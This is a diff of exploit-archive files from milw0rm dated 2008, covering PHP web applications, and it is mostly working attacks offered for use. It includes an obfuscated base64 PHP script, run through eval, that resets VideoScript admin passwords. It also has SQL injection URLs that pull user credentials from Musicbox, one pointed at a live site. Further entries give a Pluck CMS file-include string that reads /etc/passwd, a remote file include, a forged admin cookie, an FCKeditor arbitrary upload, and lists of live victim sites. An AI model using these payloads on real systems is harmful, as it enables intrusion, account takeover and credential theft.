-			"NiBGaXJlZm94LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1hbGl2".
-			"ZVxyXG5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG5D".
-			"b250ZW50LUxlbmd0aDogIi4kdGVoZGFkZV9jaGFyei4iXHJcblxyXG5ucGFzcz0iLiRuZXdfcHdk".
-			"LiImbnBhc3MxPSIuJG5ld19wd2QuIiZTdWJtaXQ9U3VibWl0XHJcbiI7JHJlcz0iIjskYXR0YWNr".
-			"ID0gZnNvY2tvcGVuKCRfUE9TVFsiTVNER05LIl0sIjgwIiwkZXJybm8sICRlcnJzdHIsIDUwKTtp".
-			"ZighJGF0dGFjayl7ZWNobygiPGJyIC8+V1RGLCBlcnIjOiAoJGVycm5vKS4kZXJyc3RyIik7cmV0".
-			"dXJuO31lY2hvKCI8c3BhbiBzdHlsZT1cImZvbnQ6bm9ybWFsIDhwdCB0YWhvbWE7XCI+Jm5ic3A7".
-			"Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7WytdIDxiPkNvbm5lY3RlZC4uLjxici8+PC9iPiZuYnNw".
-			"OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1srXSA8Yj5TZW5kaW5nIHJlcXVlc3QuLi48YnIvPjwv".
-			"Yj4iKTtmd3JpdGUoJGF0dGFjaywkam9rZSk7d2hpbGUoIWZlb2YoJGF0dGFjaykpeyRyZXMuPWZn".
-			"ZXRzKCRhdHRhY2spO31mY2xvc2UoJGF0dGFjayk7aWYgKHN0cmlzdHIoJHJlcywgInNhdmVkIikg".
-			"fHwgc3RyaXN0cigkcmVzLCAiY2hhbmdlZCIpKXtlY2hvICImbmJzcDsmbmJzcDsmbmJzcDsmbmJz".
-			"cDsmbmJzcDtbK108Yj4gRXhwbG9pdGVkICEgLCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N3b3Jk".
-			"IGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAvPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw".
-			"O1srXSAuLi48YnIgLz4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtbK10gPGI+bmV3IHBh".
-			"c3N3b3JkOjwvYj4gIi4kbmV3X3B3ZC4iPGJyIC8+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i".
-			"c3A7WytdPGI+IGFkbWluIHBhbmVsOjwvYj4gaHR0cDovLyIuJF9QT1NUWyJNU0RHTksiXS4kX1BP".
-			"U1RbIlBBVEgiXS4iYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJy".
-			"IC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI+RXhw".
-			"bG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8gIiZuYnNwOyZuYnNwOyZuYnNw".
-			"OyZuYnNwOyZuYnNwO1srXTxiPiBPb3BzICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTwvdT4g".
-			"LiAuIC4gITwvYj4iO31mbHVzaCgpO31lbHNle2VjaG8kRk9STTt9DQo=";
-	eval(base64_decode($G4N0K));
-
-/* ===[ LIVE ]===
-
-	[»] www.xxxuploads.co.uk
-	[»] www.gayphp.com
-	[»] ...
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800  // bedone in nemishe :D
-	[»] Hussain-X  // Jazakallah...
-	[»] Str0ke //Hey Brotha keep rocking on ;)
-	[»] Soudi-L0rd,Sakab...
-	[»] SMN,MSD-KiD,AMD,MSN...
-
-	Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	ALLAH,forgimme...
- */
-?>
-
-# milw0rm.com [2008-11-17]
+ ]
+
+
+	===[ XPL ]===
+																					*/
+
+error_reporting(E_ALL);
+   $G4N0K = "JEc0TjBLID0gPDw8RU9HDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
+			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCiAgICAgICAgICAgICAgICAg".
+			"ICAgICBfICAgICAgXyAgICAgICBfICAgICAgICAgIF8gICAgICBfICAgXyANCiAgICAgICAgICAg".
+			"ICAgICAgICAgIC8gXCAgICB8IHwgICAgIHwgfCAgICAgICAgLyBcICAgIHwgfCB8IHwNCiAgICAg".
+			"ICAgICAgICAgICAgICAgLyBfIFwgICB8IHwgICAgIHwgfCAgICAgICAvIF8gXCAgIHwgfF98IHwN".
+			"CiAgICAgICAgICAgICAgICAgICAvIF9fXyBcICB8IHxfX18gIHwgfF9fXyAgIC8gX19fIFwgIHwg".
+			"IF8gIHwNCiAgIElOIFRIRSBOQU1FIE9GIC9fLyAgIFxfXCB8X19fX198IHxfX19fX3wgL18vICAg".
+			"XF9cIHxffCB8X3wNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg".
+			"ICAgICAgICAgICAgICAgICANCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
+			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQogICAgICAgICAgICAg".
+			"ICAgICAgICAgX19fXyAgIF8gIF8gICAgIF8gICBfICAgIF9fXyAgICBfICBfXw0KICAgICAgICAg".
+			"ICAgICAgICAgICAgLyBfX198IHwgfHwgfCAgIHwgXCB8IHwgIC8gXyBcICB8IHwvIC8NCiAgICAg".
+			"ICAgICAgICAgICAgICAgfCB8ICBfICB8IHx8IHxfICB8ICBcfCB8IHwgfCB8IHwgfCAnIC8gDQog".
+			"ICAgICAgICAgICAgICAgICAgIHwgfF98IHwgfF9fICAgX3wgfCB8XCAgfCB8IHxffCB8IHwgLiBc".
+			"IA0KICAgICAgICAgZVhwbG8hdCBCeSAgXF9fX198ICAgIHxffCAgIHxffCBcX3wgIFxfX18vICB8".
+			"X3xcX1wNCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09".
+			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09DQoJVmlkZW9TY3JpcHQgPD0gNC4wLjEuNTAg".
+			"QWRtaW4gQ2hhbmdlIFBhc3N3b3JkIEV4cGxvaXQNCj09PT09PT09PT09PT09PT09PT09PT09PT09".
+			"PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQpF".
+			"T0c7DQplY2hvICI8cHJlPiIuJEc0TjBLLiI8L3ByZT4iOw0KJEZPUk0gPSAiPEZPUk0gYWN0aW9u".
+			"PVwiIi4kX1NFUlZFUlsiUEhQX1NFTEYiXS4iXCIgbWV0aG9kPVwiUE9TVFwiPiI7JEZPUk0uPSA8".
+			"PDxGRkYNCiAgICA8UCBzdHlsZT0id2lkdGg6IDMwMHB4O2NsZWFyOiBsZWZ0O21hcmdpbjogMDtw".
+			"YWRkaW5nOiA1cHggMCA4cHggMDtwYWRkaW5nLWxlZnQ6IDE1NXB4O2JvcmRlci10b3A6IDFweCBk".
+			"YXNoZWQgZ3JheTsiPg0KICAgIDxMQUJFTCBzdHlsZT0iZm9udC13ZWlnaHQ6IGJvbGQ7ZmxvYXQ6".
+			"IGxlZnQ7bWFyZ2luLWxlZnQ6IC0xNTVweDt3aWR0aDoxNTBweDsiIGZvcj0iTVNER05LIj4gV2Vi".
+			"c2l0ZSA6Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i".
+			"c3A7Jm5ic3A7Jm5ic3A7aHR0cDovLzwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHls".
+			"ZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIgbmFtZT0iTVNER05LIiBpZD0iTVNER05LIj48".
+			"YnIgLz4NCiAgICA8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21h".
+			"cmdpbi1sZWZ0OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9IlBBVEgiPlBhdGg6ICggL3Njcmlw".
+			"dC8gKTwvTEFCRUw+DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIg".
+			"dHlwZT0idGV4dCIgbmFtZT0iUEFUSCIgaWQ9IlBBVEgiIHZhbHVlPSIvIj48QlI+DQogICAgPFAg".
+			"c3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjogbGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAg".
+			"OHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDtib3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4N".
+			"Cgk8TEFCRUwgc3R5bGU9ImZvbnQtd2VpZ2h0OiBib2xkO2Zsb2F0OiBsZWZ0O21hcmdpbi1sZWZ0".
+			"OiAtMTU1cHg7d2lkdGg6MTUwcHg7IiBmb3I9Im5wdyI+IE5ldyBQYXNzd29yZCA6IDwvTEFCRUw+".
+			"DQogICAgICAgICAgICAgIDxJTlBVVCBzdHlsZT0id2lkdGg6IDE4MHB4OyIgdHlwZT0idGV4dCIg".
+			"bmFtZT0ibnB3IiBpZD0ibnB3Ij48QlI+DQoJPFAgc3R5bGU9IndpZHRoOiAzMDBweDtjbGVhcjog".
+			"bGVmdDttYXJnaW46IDA7cGFkZGluZzogNXB4IDAgOHB4IDA7cGFkZGluZy1sZWZ0OiAxNTVweDti".
+			"b3JkZXItdG9wOiAxcHggZGFzaGVkIGdyYXk7Ij4NCiAgICA8SU5QVVQgdHlwZT0ic3VibWl0IiBu".
+			"YW1lPSJzdWJtaXQiIHZhbHVlPSJDaGFuZ2UgaXQhIj4gPElOUFVUIHR5cGU9InJlc2V0Ij4NCiAg".
+			"ICA8L1A+DQogPC9GT1JNPg0KRkZGOw0KaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pICYmIGlz".
+			"c2V0KCRfUE9TVFsiTVNER05LIl0pICYmICFlbXB0eSgkX1BPU1RbIk1TREdOSyJdKSAmJiBpc3Nl".
+			"dCgkX1BPU1RbJ25wdyddKSAmJiAhZW1wdHkoJF9QT1NUWyducHcnXSkgJiYgaXNzZXQoJF9QT1NU".
+			"WyJQQVRIIl0pICYmICFlbXB0eSgkX1BPU1RbIlBBVEgiXSkpIHskbmV3X3B3ZCA9ICRfUE9TVFsn".
+			"bnB3J107JHRlaGRhZGVfY2hhcnogPSBzdHJsZW4odXJsZW5jb2RlKCRuZXdfcHdkKSkgKiAyICsg".
+			"Mjg7JGpva2U9IlBPU1QgIi4kX1BPU1RbIlBBVEgiXS4iYWRtaW4vY3AucGhwIEhUVFAvMS4xXHJc".
+			"bkhvc3Q6ICIuJF9QT1NUWyJNU0RHTksiXS4iXHJcblVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChX".
+			"aW5kb3dzOyBVOyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOSkgR2Vja28vMjAwODA1Mjkw".
+			"NiBGaXJlZm94LzMuMFxyXG5LZWVwLUFsaXZlOiAzMDBcclxuQ29ubmVjdGlvbjoga2VlcC1hbGl2".
+			"ZVxyXG5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZFxyXG5D".
+			"b250ZW50LUxlbmd0aDogIi4kdGVoZGFkZV9jaGFyei4iXHJcblxyXG5ucGFzcz0iLiRuZXdfcHdk".
+			"LiImbnBhc3MxPSIuJG5ld19wd2QuIiZTdWJtaXQ9U3VibWl0XHJcbiI7JHJlcz0iIjskYXR0YWNr".
+			"ID0gZnNvY2tvcGVuKCRfUE9TVFsiTVNER05LIl0sIjgwIiwkZXJybm8sICRlcnJzdHIsIDUwKTtp".
+			"ZighJGF0dGFjayl7ZWNobygiPGJyIC8+V1RGLCBlcnIjOiAoJGVycm5vKS4kZXJyc3RyIik7cmV0".
+			"dXJuO31lY2hvKCI8c3BhbiBzdHlsZT1cImZvbnQ6bm9ybWFsIDhwdCB0YWhvbWE7XCI+Jm5ic3A7".
+			"Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7WytdIDxiPkNvbm5lY3RlZC4uLjxici8+PC9iPiZuYnNw".
+			"OyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO1srXSA8Yj5TZW5kaW5nIHJlcXVlc3QuLi48YnIvPjwv".
+			"Yj4iKTtmd3JpdGUoJGF0dGFjaywkam9rZSk7d2hpbGUoIWZlb2YoJGF0dGFjaykpeyRyZXMuPWZn".
+			"ZXRzKCRhdHRhY2spO31mY2xvc2UoJGF0dGFjayk7aWYgKHN0cmlzdHIoJHJlcywgInNhdmVkIikg".
+			"fHwgc3RyaXN0cigkcmVzLCAiY2hhbmdlZCIpKXtlY2hvICImbmJzcDsmbmJzcDsmbmJzcDsmbmJz".
+			"cDsmbmJzcDtbK108Yj4gRXhwbG9pdGVkICEgLCA8Zm9udCBjb2xvcj1cInJlZFwiPlBhc3N3b3Jk".
+			"IGNoYW5nZWQuLi48L2I+PC9mb250PjxiciAvPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw".
+			"O1srXSAuLi48YnIgLz4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtbK10gPGI+bmV3IHBh".
+			"c3N3b3JkOjwvYj4gIi4kbmV3X3B3ZC4iPGJyIC8+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i".
+			"c3A7WytdPGI+IGFkbWluIHBhbmVsOjwvYj4gaHR0cDovLyIuJF9QT1NUWyJNU0RHTksiXS4kX1BP".
+			"U1RbIlBBVEgiXS4iYWRtaW4vPGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PGJy".
+			"IC8+PHNwYW4gc3R5bGU9XCJmb250Om5vcm1hbCA4cHQgdGFob21hO2NvbG9yOiNDQ0M7XCI+RXhw".
+			"bG9pdCBCeSBHNE4wSy4uLjwvc3Bhbj4iO30gZWxzZSB7IGVjaG8gIiZuYnNwOyZuYnNwOyZuYnNw".
+			"OyZuYnNwOyZuYnNwO1srXTxiPiBPb3BzICwgIHNyeSAsICA8dT5ub3QgVnVsbmVyYWJsZTwvdT4g".
+			"LiAuIC4gITwvYj4iO31mbHVzaCgpO31lbHNle2VjaG8kRk9STTt9DQo=";
+	eval(base64_decode($G4N0K));
+
+/* ===[ LIVE ]===
+
+	[»] www.xxxuploads.co.uk
+	[»] www.gayphp.com
+	[»] ...
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800  // bedone in nemishe :D
+	[»] Hussain-X  // Jazakallah...
+	[»] Str0ke //Hey Brotha keep rocking on ;)
+	[»] Soudi-L0rd,Sakab...
+	[»] SMN,MSD-KiD,AMD,MSN...
+
+	Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	ALLAH,forgimme...
+ */
+?>
+
+# milw0rm.com [2008-11-17]
diff --git a/platforms/php/webapps/7152.txt b/platforms/php/webapps/7152.txt
index cf608b195..4a28a83df 100755
--- a/platforms/php/webapps/7152.txt
+++ b/platforms/php/webapps/7152.txt
@@ -1,38 +1,38 @@
-==================================================================================================================
-          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
-          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
-          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
-              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
-          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
-===================================================SNAKES TEAM====================================================
-                                                                                       
-                             Script: Musicbox Version 2.3.8  Remote SQL Injection Vulnerability                                  
-                                                                                                              
-==============================================:::ALGERIAN HaCkEr:::===============================================
-                =        =                                                                =          =
-                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
-                =                                                                                    =
-                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
-                =                                                                                    =
-                =       =                 :::::Mail: snakespc@gmail.com:::::::             =         =
-                =                                                                                    =
-                =                Sript Demo:http://www.musicboxv2.com/services/demo.php              =
-                =                                www.musicboxv2.com                                  =              
-                 =================================== Snakespc ======================================    
-
-
-Exploit:
-
-http://www.localhost/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
-
-Demo :
-
-http://www.musicboxv2.com/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
-                                                                   
-===================================================================================================================
-Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
-ALL www.Snakespc.com/SC >>>> Members 
-str0ke.....>>>>.....milw0rm
-===================================================================================================================
-
-# milw0rm.com [2008-11-18]
+==================================================================================================================
+          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
+          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
+          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
+              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
+          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
+===================================================SNAKES TEAM====================================================
+                                                                                       
+                             Script: Musicbox Version 2.3.8  Remote SQL Injection Vulnerability                                  
+                                                                                                              
+==============================================:::ALGERIAN HaCkEr:::===============================================
+                =        =                                                                =          =
+                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
+                =                                                                                    =
+                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
+                =                                                                                    =
+                =       =                 :::::Mail: snakespc@gmail.com:::::::             =         =
+                =                                                                                    =
+                =                Sript Demo:http://www.musicboxv2.com/services/demo.php              =
+                =                                www.musicboxv2.com                                  =              
+                 =================================== Snakespc ======================================    
+
+
+Exploit:
+
+http://www.localhost/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
+
+Demo :
+
+http://www.musicboxv2.com/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
+                                                                   
+===================================================================================================================
+Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
+ALL www.Snakespc.com/SC >>>> Members 
+str0ke.....>>>>.....milw0rm
+===================================================================================================================
+
+# milw0rm.com [2008-11-18]
diff --git a/platforms/php/webapps/7153.txt b/platforms/php/webapps/7153.txt
index ea87eb9f9..513155e50 100755
--- a/platforms/php/webapps/7153.txt
+++ b/platforms/php/webapps/7153.txt
@@ -1,80 +1,80 @@
-Hello, bugtraq.
-
-Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-039
-
-
-Application:                    Pluck CMS
-Versions Affected:              4.5.3
-Vendor URL:                     http://www.pluck-cms.org/
-Bug:                            Local File Include
-Exploits:                       YES
-Reported:                       25.08.2008
-Vendor Response:                30.08.2008
-Solution:                       YES 
-Date of Public Advisory:        18.11.2008
-Author:                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
-
-
-
-Description
-***********
-
-Pluck CMS has Local File Include vulnerability. 
-
-
-
-Details
-*******
-
-1. Local File Include vulnerability found in script data/inc/lib/pcltar.lib.php
-
-Successful exploitation requires that "register_globals" is enabled.
-
-Code
-----
-#################################################
-
-  if (!isset($g_pcltar_lib_dir))
-    $g_pcltar_lib_dir = "lib";
-
-...
-
-  $g_pcltar_extension = "php";
-
-  if (!defined("PCLERROR_LIB"))
-  {
-    include("data/inc/$g_pcltar_lib_dir/pclerror.lib.$g_pcltar_extension");
-  }
-  if (!defined("PCLTRACE_LIB"))
-  {
-    include("data/inc/$g_pcltar_lib_dir/pcltrace.lib.$g_pcltar_extension");
-  }
-
-#################################################
-
-Example:
-
-http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00
-
-
-
-Solution
-********
-Vendor fix this flaw on 09.08.2008. New version of Pluck CMS 4.6 can be download here:
-
-
-http://www.pluck-cms.org/downloads/click.php?id=8
-
-
-
-About
-*****
-
-Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
-Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
-
-
-Contact:    research [at] dsec [dot] ru
-            http://www.dsec.ru (in Russian)
-
-# milw0rm.com [2008-11-18]
+Hello, bugtraq.
+
+Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-039
+
+
+Application:                    Pluck CMS
+Versions Affected:              4.5.3
+Vendor URL:                     http://www.pluck-cms.org/
+Bug:                            Local File Include
+Exploits:                       YES
+Reported:                       25.08.2008
+Vendor Response:                30.08.2008
+Solution:                       YES 
+Date of Public Advisory:        18.11.2008
+Author:                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
+
+
+
+Description
+***********
+
+Pluck CMS has Local File Include vulnerability. 
+
+
+
+Details
+*******
+
+1. Local File Include vulnerability found in script data/inc/lib/pcltar.lib.php
+
+Successful exploitation requires that "register_globals" is enabled.
+
+Code
+----
+#################################################
+
+  if (!isset($g_pcltar_lib_dir))
+    $g_pcltar_lib_dir = "lib";
+
+...
+
+  $g_pcltar_extension = "php";
+
+  if (!defined("PCLERROR_LIB"))
+  {
+    include("data/inc/$g_pcltar_lib_dir/pclerror.lib.$g_pcltar_extension");
+  }
+  if (!defined("PCLTRACE_LIB"))
+  {
+    include("data/inc/$g_pcltar_lib_dir/pcltrace.lib.$g_pcltar_extension");
+  }
+
+#################################################
+
+Example:
+
+http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00
+
+
+
+Solution
+********
+Vendor fix this flaw on 09.08.2008. New version of Pluck CMS 4.6 can be download here:
+
+
+http://www.pluck-cms.org/downloads/click.php?id=8
+
+
+
+About
+*****
+
+Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
+Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
+
+
+Contact:    research [at] dsec [dot] ru
+            http://www.dsec.ru (in Russian)
+
+# milw0rm.com [2008-11-18]
diff --git a/platforms/php/webapps/7155.txt b/platforms/php/webapps/7155.txt
index b4ac8ef95..cc13b73b2 100755
--- a/platforms/php/webapps/7155.txt
+++ b/platforms/php/webapps/7155.txt
@@ -1,24 +1,24 @@
-####################################################################################################
-# Directory v1.1.1 (API_HOME_DIR) RFI Vulnerablity                                                 #
-# © Ghost Hacker , Real Hack Back :)                                                               #
-####################################################################################################
-#[~] Author : Ghost Hacker                                                                         #
-#[~] Homepage : www.Real-h.com  [Real Hack Back]                                                   #
-#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
-#[~] Bug : RFI                                                                                     #
-#[~] From : Kingdom Saudi Arabia                                                                   #
-#[~] Name Script : Directory v1.1.1                                                                #
-#[~] Download : http://www.freedirectoryscript.com/download/fds-v111-rc.zip                        #
-####################################################################################################
-#[~] Exploit :                                                                                     #
-# init.php?API_HOME_DIR=Evil_Code                                                                  #
-####################################################################################################
-#[~]GreetZ :                                                                                       #
-# Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz                          #
-# Mr.MN7oS , Mr.Hope , Scary.Hacker , Qabandi , v4-team.com                                        #
-# All Members Real Hack , All My Friends :)                                                        #
-####################################################################################################
-# Viva Real Hack - Real-h.com ..                                                                   #
-####################################################################################################
-
-# milw0rm.com [2008-11-18]
+####################################################################################################
+# Directory v1.1.1 (API_HOME_DIR) RFI Vulnerablity                                                 #
+# © Ghost Hacker , Real Hack Back :)                                                               #
+####################################################################################################
+#[~] Author : Ghost Hacker                                                                         #
+#[~] Homepage : www.Real-h.com  [Real Hack Back]                                                   #
+#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
+#[~] Bug : RFI                                                                                     #
+#[~] From : Kingdom Saudi Arabia                                                                   #
+#[~] Name Script : Directory v1.1.1                                                                #
+#[~] Download : http://www.freedirectoryscript.com/download/fds-v111-rc.zip                        #
+####################################################################################################
+#[~] Exploit :                                                                                     #
+# init.php?API_HOME_DIR=Evil_Code                                                                  #
+####################################################################################################
+#[~]GreetZ :                                                                                       #
+# Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz                          #
+# Mr.MN7oS , Mr.Hope , Scary.Hacker , Qabandi , v4-team.com                                        #
+# All Members Real Hack , All My Friends :)                                                        #
+####################################################################################################
+# Viva Real Hack - Real-h.com ..                                                                   #
+####################################################################################################
+
+# milw0rm.com [2008-11-18]
diff --git a/platforms/php/webapps/7156.txt b/platforms/php/webapps/7156.txt
index e91fc3823..156e68a69 100755
--- a/platforms/php/webapps/7156.txt
+++ b/platforms/php/webapps/7156.txt
@@ -1,19 +1,19 @@
--=================================================-
-Autore: x0r
-Bug: Insecure Cookie Handling
-Cms: E-TopBiz Link Back Checker 1
--================================================-
-
-Exploit:
-
-javascript:document.cookie="auth=admin; path=/";
-
-Live Demo:
-http://e-topbiz.com/trafficdemos/linkback1/admincontrol/login.php
-
-Greetz: Grazie alla persona che mi ha cambiato la vita, amore sto parlando
-dite, sei il mio angelo custode ti amo troppo 8\10\08 PER SEMPRE.
-
-EoF
-
-# milw0rm.com [2008-11-18]
+-=================================================-
+Autore: x0r
+Bug: Insecure Cookie Handling
+Cms: E-TopBiz Link Back Checker 1
+-================================================-
+
+Exploit:
+
+javascript:document.cookie="auth=admin; path=/";
+
+Live Demo:
+http://e-topbiz.com/trafficdemos/linkback1/admincontrol/login.php
+
+Greetz: Grazie alla persona che mi ha cambiato la vita, amore sto parlando
+dite, sei il mio angelo custode ti amo troppo 8\10\08 PER SEMPRE.
+
+EoF
+
+# milw0rm.com [2008-11-18]
diff --git a/platforms/php/webapps/7157.txt b/platforms/php/webapps/7157.txt
index 4f9a79889..890c7fa51 100755
--- a/platforms/php/webapps/7157.txt
+++ b/platforms/php/webapps/7157.txt
@@ -1,49 +1,49 @@
-########################################################################
-#
-#                        Yellow Flood Organization
-#
-# Alex News-engine (fckeditor) Arbitrary File Upload
-#
-# Source: http://www.alexscriptengine.de/blog/category/news-engine/
-#
-# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/
-#
-# Discover by: Batter
-#
-########################################################################
-
-
-
-####################
-- Vulnerability:
-####################
-
-/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/
-
-####################
-- Exploit:
-####################
-
-http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
-
-####################
-- how To use:
-####################
-
-http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
-
-####################
-- Solution:
-####################
-
-Restrict and grant only trusted users access to the resources.
-
-####################
-- Greets :
-####################
-
-THE.HACKER.ONE , Str0ke
-
-####################
-
-# milw0rm.com [2008-11-19]
+########################################################################
+#
+#                        Yellow Flood Organization
+#
+# Alex News-engine (fckeditor) Arbitrary File Upload
+#
+# Source: http://www.alexscriptengine.de/blog/category/news-engine/
+#
+# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/
+#
+# Discover by: Batter
+#
+########################################################################
+
+
+
+####################
+- Vulnerability:
+####################
+
+/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/
+
+####################
+- Exploit:
+####################
+
+http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
+
+####################
+- how To use:
+####################
+
+http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
+
+####################
+- Solution:
+####################
+
+Restrict and grant only trusted users access to the resources.
+
+####################
+- Greets :
+####################
+
+THE.HACKER.ONE , Str0ke
+
+####################
+
+# milw0rm.com [2008-11-19]
diff --git a/platforms/php/webapps/7159.php b/platforms/php/webapps/7159.php
index 77d575b8c..41daca9cb 100755
--- a/platforms/php/webapps/7159.php
+++ b/platforms/php/webapps/7159.php
@@ -1,283 +1,283 @@
-starting();
-$exploit->is_vulnerable($domain);
-$exploit->exploiting($domain,$mymode);
-
- 
-
-class Exploit
-{
-  
-  function http_request($host,$data) 
-  {   
-   
-    if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) 
-    {
-       echo "socket_create() error!\r\n";
-       exit;
-    }
-    if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1))
-    { 
-      echo "socket_set_option() error!\r\n";
